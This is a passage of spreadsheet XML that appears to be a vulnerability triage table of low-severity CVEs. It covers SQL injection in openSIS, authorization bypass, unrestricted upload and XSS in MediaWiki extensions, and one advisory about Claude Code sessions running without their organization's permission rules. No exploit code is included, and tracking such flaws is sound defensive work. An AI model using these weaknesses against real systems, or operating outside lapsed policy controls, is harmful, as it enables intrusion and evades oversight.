      <c r="C576" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103116</t>
        </is>
      </c>
      <c r="D576" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E576" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F576" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G576" s="5" t="inlineStr"/>
      <c r="H576" s="5" t="inlineStr"/>
      <c r="I576" s="5" t="inlineStr"/>
      <c r="J576" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K576" s="5" t="inlineStr"/>
      <c r="L576" s="5" t="inlineStr"/>
      <c r="M576" s="5" t="inlineStr"/>
      <c r="N576" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O576" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P576" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q576" s="5" t="inlineStr"/>
      <c r="R576" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S576" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in OS4ED openSIS-Classic up to 9.3. This impacts the function DBQuery of the file functions/GetStuListFnc.php of the component Student List Search Endpoint. This manipulation of the argument LO_sort causes sql injection. The attack can be initiated remotely. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T576" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103116</t>
        </is>
      </c>
    </row>
    <row r="577">
      <c r="A577" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B577" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C577" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103233</t>
        </is>
      </c>
      <c r="D577" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E577" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F577" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G577" s="5" t="inlineStr"/>
      <c r="H577" s="5" t="inlineStr"/>
      <c r="I577" s="5" t="inlineStr"/>
      <c r="J577" s="5" t="inlineStr"/>
      <c r="K577" s="5" t="inlineStr"/>
      <c r="L577" s="5" t="inlineStr"/>
      <c r="M577" s="5" t="inlineStr"/>
      <c r="N577" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O577" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P577" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q577" s="5" t="inlineStr"/>
      <c r="R577" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-639</t>
        </is>
      </c>
      <c r="S577" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in AdithyaYelloju Restaurant-Management-System up to 7f0e7e84255e8fcfd488e83f8f91451bbbff6b9c. This impacts an unknown function of the file /admin/ of the component Admin Area. Such manipulation of the argument ID leads to authorization bypass. The attack can be executed remotely. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T577" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103233</t>
        </is>
      </c>
    </row>
    <row r="578">
      <c r="A578" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B578" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C578" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103012</t>
        </is>
      </c>
      <c r="D578" s="5" t="n">
        <v>2</v>
      </c>
      <c r="E578" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F578" s="5" t="inlineStr">
        <is>
          <t>98a01053-8a31-4f6d-9aa9-252be161adc6</t>
        </is>
      </c>
      <c r="G578" s="5" t="inlineStr"/>
      <c r="H578" s="5" t="inlineStr"/>
      <c r="I578" s="5" t="inlineStr"/>
      <c r="J578" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K578" s="5" t="inlineStr"/>
      <c r="L578" s="5" t="inlineStr"/>
      <c r="M578" s="5" t="inlineStr"/>
      <c r="N578" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O578" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P578" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q578" s="5" t="inlineStr"/>
      <c r="R578" s="5" t="inlineStr">
        <is>
          <t>CWE-696</t>
        </is>
      </c>
      <c r="S578" s="5" t="inlineStr">
        <is>
          <t>Claude Code selected an API key stored by Claude Code, for example from an earlier `/login` or written directly to its configuration, ahead of the user's valid Claude Enterprise or Team sign-in when fetching the organization's server-managed settings, even though the session itself authenticated with the Enterprise or Team account. When the settings endpoint rejected that stored key, the session started without the organization's server-managed policy (such as permission deny rules, model restrictions and managed-only locks) or, if a previously cached copy existed on the machine, kept applying that stale copy without receiving later policy changes — while continuing to operate as the organization's account. Triggering this required local access to a device with such a stored API key; the no-policy case additionally required that no managed settings had previously been cached. Endpoint-managed (MDM or file-based) settings were not affected. Claude for Enterprise organizations were affected from version 2.0.68; Claude for Work (Team) organizations from version 2.1.38, when server-managed settings became available to them.
Users on standard Claude Code auto-update have received this fix already. Users performing manual updates are advised to update to version 2.1.260 or later.
Thank you to Tamas Voros / NVIDIA AI Red Team for reporting this issue.</t>
        </is>
      </c>
      <c r="T578" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103012</t>
        </is>
      </c>
    </row>
    <row r="579">
      <c r="A579" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B579" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C579" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103113</t>
        </is>
      </c>
      <c r="D579" s="5" t="n">
        <v>2</v>
      </c>
      <c r="E579" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F579" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G579" s="5" t="inlineStr"/>
      <c r="H579" s="5" t="inlineStr"/>
      <c r="I579" s="5" t="inlineStr"/>
      <c r="J579" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K579" s="5" t="inlineStr"/>
      <c r="L579" s="5" t="inlineStr"/>
      <c r="M579" s="5" t="inlineStr"/>
      <c r="N579" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O579" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P579" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q579" s="5" t="inlineStr"/>
      <c r="R579" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S579" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in OS4ED openSIS-Classic up to 9.3. The affected element is the function save action of the file modules/students/Student.php of the component General Information Tab. Executing a manipulation of the argument students can lead to sql injection. The attack may be performed from remote. The exploit has been publicly disclosed and may be utilized. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T579" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103113</t>
        </is>
      </c>
    </row>
    <row r="580">
      <c r="A580" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B580" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C580" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103117</t>
        </is>
      </c>
      <c r="D580" s="5" t="n">
        <v>2</v>
      </c>
      <c r="E580" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F580" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G580" s="5" t="inlineStr"/>
      <c r="H580" s="5" t="inlineStr"/>
      <c r="I580" s="5" t="inlineStr"/>
      <c r="J580" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K580" s="5" t="inlineStr"/>
      <c r="L580" s="5" t="inlineStr"/>
      <c r="M580" s="5" t="inlineStr"/>
      <c r="N580" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O580" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P580" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q580" s="5" t="inlineStr"/>
      <c r="R580" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S580" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in OS4ED openSIS-Classic up to 9.3. Affected is the function db_properties of the file functions/DatabaseInc.php of the component Save Data Handler. Such manipulation of the argument values leads to sql injection. The attack can be launched remotely. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T580" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103117</t>
        </is>
      </c>
    </row>
    <row r="581">
      <c r="A581" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B581" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C581" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76144</t>
        </is>
      </c>
      <c r="D581" s="5" t="n">
        <v>1.8</v>
      </c>
      <c r="E581" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F581" s="5" t="inlineStr">
        <is>
          <t>vuln@krcert.or.kr</t>
        </is>
      </c>
      <c r="G581" s="5" t="inlineStr"/>
      <c r="H581" s="5" t="inlineStr"/>
      <c r="I581" s="5" t="inlineStr"/>
      <c r="J581" s="5" t="inlineStr"/>
      <c r="K581" s="5" t="inlineStr"/>
      <c r="L581" s="5" t="inlineStr"/>
      <c r="M581" s="5" t="inlineStr"/>
      <c r="N581" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O581" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P581" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q581" s="5" t="inlineStr"/>
      <c r="R581" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="S581" s="5" t="inlineStr">
        <is>
          <t>An unrestricted file upload vulnerability caused by insufficient file extension and integrity verification in Genian SSL PNS allows an attacker to upload a dangerous file that is not an official patch</t>
        </is>
      </c>
      <c r="T581" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76144</t>
        </is>
      </c>
    </row>
    <row r="582">
      <c r="A582" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B582" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C582" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103440</t>
        </is>
      </c>
      <c r="D582" s="5" t="n">
        <v>1.2</v>
      </c>
      <c r="E582" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F582" s="5" t="inlineStr">
        <is>
          <t>c4f26cc8-17ff-4c99-b5e2-38fc1793eacc</t>
        </is>
      </c>
      <c r="G582" s="5" t="inlineStr"/>
      <c r="H582" s="5" t="inlineStr"/>
      <c r="I582" s="5" t="inlineStr"/>
      <c r="J582" s="5" t="inlineStr"/>
      <c r="K582" s="5" t="inlineStr"/>
      <c r="L582" s="5" t="inlineStr"/>
      <c r="M582" s="5" t="inlineStr"/>
      <c r="N582" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O582" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P582" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q582" s="5" t="inlineStr"/>
      <c r="R582" s="5" t="inlineStr">
        <is>
          <t>CWE-202</t>
        </is>
      </c>
      <c r="S582" s="5" t="inlineStr">
        <is>
          <t>Exposure of sensitive information through data queries vulnerability in The Wikimedia Foundation MediaWiki PageTriage extension allows Information Elicitation.
This issue affects MediaWiki PageTriage extension: 1.46, 1.45, and 1.43.</t>
        </is>
      </c>
      <c r="T582" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103440</t>
        </is>
      </c>
    </row>
    <row r="583">
      <c r="A583" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B583" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C583" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103445</t>
        </is>
      </c>
      <c r="D583" s="5" t="n">
        <v>1.2</v>
      </c>
      <c r="E583" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F583" s="5" t="inlineStr">
        <is>
          <t>c4f26cc8-17ff-4c99-b5e2-38fc1793eacc</t>
        </is>
      </c>
      <c r="G583" s="5" t="inlineStr"/>
      <c r="H583" s="5" t="inlineStr"/>
      <c r="I583" s="5" t="inlineStr"/>
      <c r="J583" s="5" t="inlineStr"/>
      <c r="K583" s="5" t="inlineStr"/>
      <c r="L583" s="5" t="inlineStr"/>
      <c r="M583" s="5" t="inlineStr"/>
      <c r="N583" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O583" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P583" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q583" s="5" t="inlineStr"/>
      <c r="R583" s="5" t="inlineStr">
        <is>
          <t>CWE-80</t>
        </is>
      </c>
      <c r="S583" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of Script-Related HTML tags in a web page (basic XSS) vulnerability in The Wikimedia Foundation MediaWiki Page_Forms extension allows Stored XSS.
This issue affects MediaWiki Page_Forms extension: 1.46, 1.45, and 1.43.</t>
        </is>
      </c>
      <c r="T583" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103445</t>
        </is>
      </c>
    </row>
    <row r="584">
      <c r="A584" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B584" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C584" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103585</t>
        </is>
      </c>
      <c r="D584" s="5" t="n">
        <v>1.2</v>
      </c>
      <c r="E584" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F584" s="5" t="inlineStr">
        <is>
          <t>c4f26cc8-17ff-4c99-b5e2-38fc1793eacc</t>
        </is>
      </c>
      <c r="G584" s="5" t="inlineStr"/>
      <c r="H584" s="5" t="inlineStr"/>
      <c r="I584" s="5" t="inlineStr"/>
      <c r="J584" s="5" t="inlineStr"/>
      <c r="K584" s="5" t="inlineStr"/>
      <c r="L584" s="5" t="inlineStr"/>
      <c r="M584" s="5" t="inlineStr"/>
      <c r="N584" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O584" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P584" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q584" s="5" t="inlineStr"/>
      <c r="R584" s="5" t="inlineStr">
        <is>
          <t>CWE-80</t>
        </is>
      </c>
      <c r="S584" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of Script-Related HTML tags in a web page (basic XSS) vulnerability in The Wikimedia Foundation MediaWiki MediaSearch extension allows Cross-Site Scripting (XSS).
This issue affects MediaWiki MediaSearch extension: 1.46, 1.45, and 1.43.</t>
        </is>
      </c>
      <c r="T584" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103585</t>
        </is>
      </c>
    </row>
    <row r="585">
      <c r="A585" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B585" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C585" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103437</t>
        </is>
      </c>
      <c r="D585" s="5" t="n">
        <v>1.1</v>
      </c>
      <c r="E585" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F585" s="5" t="inlineStr">
        <is>
          <t>c4f26cc8-17ff-4c99-b5e2-38fc1793eacc</t>
        </is>
      </c>
      <c r="G585" s="5" t="inlineStr"/>
      <c r="H585" s="5" t="inlineStr"/>
      <c r="I585" s="5" t="inlineStr"/>
      <c r="J585" s="5" t="inlineStr"/>
      <c r="K585" s="5" t="inlineStr"/>
      <c r="L585" s="5" t="inlineStr"/>
      <c r="M585" s="5" t="inlineStr"/>
      <c r="N585" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O585" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P585" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q585" s="5" t="inlineStr"/>
      <c r="R585" s="5" t="inlineStr">
        <is>
          <t>CWE-80</t>
        </is>
      </c>
      <c r="S585" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of Script-Related HTML tags in a web page (basic XSS) vulnerability in The Wikimedia Foundation MediaWiki ReadingLists extension allows Reflected XSS.
This issue affects MediaWiki ReadingLists extension: 1.46 and 1.45.</t>
        </is>
      </c>
      <c r="T585" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103437</t>
        </is>
      </c>
    </row>
    <row r="586">
      <c r="A586" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B586" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C586" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103443</t>
        </is>
      </c>
      <c r="D586" s="5" t="n">
        <v>1.1</v>
      </c>
      <c r="E586" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F586" s="5" t="inlineStr">
        <is>
          <t>c4f26cc8-17ff-4c99-b5e2-38fc1793eacc</t>
        </is>
      </c>
      <c r="G586" s="5" t="inlineStr"/>
      <c r="H586" s="5" t="inlineStr"/>
      <c r="I586" s="5" t="inlineStr"/>
      <c r="J586" s="5" t="inlineStr"/>
      <c r="K586" s="5" t="inlineStr"/>
      <c r="L586" s="5" t="inlineStr"/>
      <c r="M586" s="5" t="inlineStr"/>
      <c r="N586" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O586" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P586" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q586" s="5" t="inlineStr"/>
      <c r="R586" s="5" t="inlineStr">
        <is>
          <t>CWE-80</t>
        </is>
      </c>
      <c r="S586" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of Script-Related HTML tags in a web page (basic XSS) vulnerability in The Wikimedia Foundation MediaWiki Collection (Book) extension allows XSS Targeting Non-Script Elements.
This issue affects MediaWiki Collection (Book) extension: 1.46, 1.45, and 1.43.</t>
        </is>
      </c>
      <c r="T586" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103443</t>
        </is>
      </c>
    </row>
    <row r="587">
      <c r="A587" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B587" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C587" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103444</t>
        </is>
      </c>
      <c r="D587" s="5" t="n">
        <v>1.1</v>
      </c>
      <c r="E587" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F587" s="5" t="inlineStr">
        <is>
          <t>c4f26cc8-17ff-4c99-b5e2-38fc1793eacc</t>
        </is>
      </c>
      <c r="G587" s="5" t="inlineStr"/>
      <c r="H587" s="5" t="inlineStr"/>
      <c r="I587" s="5" t="inlineStr"/>
      <c r="J587" s="5" t="inlineStr"/>
      <c r="K587" s="5" t="inlineStr"/>
      <c r="L587" s="5" t="inlineStr"/>
      <c r="M587" s="5" t="inlineStr"/>
      <c r="N587" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O587" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P587" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q587" s="5" t="inlineStr"/>
      <c r="R587" s="5" t="inlineStr">
        <is>
          <t>CWE-80</t>
        </is>
      </c>
      <c r="S587" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of Script-Related HTML tags in a web page (basic XSS) vulnerability in The Wikimedia Foundation MediaWiki WikiForum extension allows Stored XSS.
This issue affects MediaWiki WikiForum extension: master.</t>
        </is>
      </c>
      <c r="T587" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103444</t>
        </is>
      </c>
    </row>
    <row r="588">
      <c r="A588" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B588" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C588" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103584</t>
        </is>
      </c>
      <c r="D588" s="5" t="n">
        <v>1.1</v>
      </c>
      <c r="E588" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F588" s="5" t="inlineStr">
        <is>
          <t>c4f26cc8-17ff-4c99-b5e2-38fc1793eacc</t>
        </is>
      </c>
      <c r="G588" s="5" t="inlineStr"/>
      <c r="H588" s="5" t="inlineStr"/>
      <c r="I588" s="5" t="inlineStr"/>
      <c r="J588" s="5" t="inlineStr"/>
      <c r="K588" s="5" t="inlineStr"/>
      <c r="L588" s="5" t="inlineStr"/>
      <c r="M588" s="5" t="inlineStr"/>
      <c r="N588" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O588" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P588" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q588" s="5" t="inlineStr"/>
      <c r="R588" s="5" t="inlineStr">
        <is>
          <t>CWE-80</t>
        </is>
      </c>
      <c r="S588" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of Script-Related HTML tags in a web page (basic XSS) vulnerability in The Wikimedia Foundation MediaWiki CommonsMetadata extension allows Cross-Site Scripting (XSS).
This issue affects MediaWiki CommonsMetadata extension: 1.46, 1.45, and 1.43.</t>
        </is>
      </c>
      <c r="T588" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103584</t>
        </is>
      </c>
    </row>
    <row r="589">
      <c r="A589" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B589" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C589" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103438</t>
        </is>
      </c>
      <c r="D589" s="5" t="n">
        <v>0.3</v>
      </c>
      <c r="E589" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F589" s="5" t="inlineStr">
        <is>
          <t>c4f26cc8-17ff-4c99-b5e2-38fc1793eacc</t>
        </is>
      </c>
      <c r="G589" s="5" t="inlineStr"/>
      <c r="H589" s="5" t="inlineStr"/>
      <c r="I589" s="5" t="inlineStr"/>
      <c r="J589" s="5" t="inlineStr"/>
      <c r="K589" s="5" t="inlineStr"/>
      <c r="L589" s="5" t="inlineStr"/>
      <c r="M589" s="5" t="inlineStr"/>
      <c r="N589" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O589" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P589" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q589" s="5" t="inlineStr"/>
      <c r="R589" s="5" t="inlineStr">
        <is>
          <t>CWE-80</t>
        </is>
      </c>
      <c r="S589" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of Script-Related HTML tags in a web page (basic XSS) vulnerability in The Wikimedia Foundation MediaWiki Wikistories extension allows Cross-Site Scripting (XSS).
This issue affects MediaWiki Wikistories extension: 1.46, 1.45, and 1.43.</t>
        </is>
      </c>
      <c r="T589" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103438</t>
        </is>
      </c>
    </row>
    <row r="590">
      <c r="A590" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B590" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C590" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103439</t>
        </is>
      </c>
      <c r="D590" s="5" t="n">
        <v>0.3</v>
      </c>
      <c r="E590" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F590" s="5" t="inlineStr">
        <is>
          <t>c4f26cc8-17ff-4c99-b5e2-38fc1793eacc</t>
        </is>
      </c>
      <c r="G590" s="5" t="inlineStr"/>
      <c r="H590" s="5" t="inlineStr"/>
      <c r="I590" s="5" t="inlineStr"/>
      <c r="J590" s="5" t="inlineStr"/>
      <c r="K590" s="5" t="inlineStr"/>
      <c r="L590" s="5" t="inlineStr"/>
      <c r="M590" s="5" t="inlineStr"/>
      <c r="N590" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O590" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P590" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q590" s="5" t="inlineStr"/>
      <c r="R590" s="5" t="inlineStr">
        <is>
          <t>CWE-80</t>
        </is>
      </c>
      <c r="S590" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of Script-Related HTML tags in a web page (basic XSS) vulnerability in The Wikimedia Foundation MediaWiki Wikbase extension allows Cross-Site Scripting (XSS).
This issue affects MediaWiki Wikbase extension: 1.46, 1.45, and 1.43.</t>
        </is>
      </c>
      <c r="T590" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103439</t>
        </is>
      </c>
    </row>
    <row r="591">
      <c r="A591" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B591" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C591" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100689</t>
        </is>
      </c>
      <c r="D591" s="5" t="inlineStr"/>
      <c r="E591" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F591" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G591" s="5" t="inlineStr"/>
      <c r="H591" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I591" s="5" t="inlineStr"/>
      <c r="J591" s="5" t="inlineStr">
        <is>
          <t>pypi, python</t>
        </is>
      </c>
      <c r="K591" s="5" t="inlineStr"/>
      <c r="L591" s="5" t="inlineStr">
        <is>
          <t>PyPI:gitpython</t>
        </is>
      </c>
      <c r="M591" s="5" t="inlineStr">
        <is>
          <t>3.1.62</t>
        </is>
      </c>
      <c r="N591" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O591" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P591" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q591" s="5" t="inlineStr"/>
      <c r="R591" s="5" t="inlineStr"/>
      <c r="S591" s="5" t="inlineStr">
        <is>
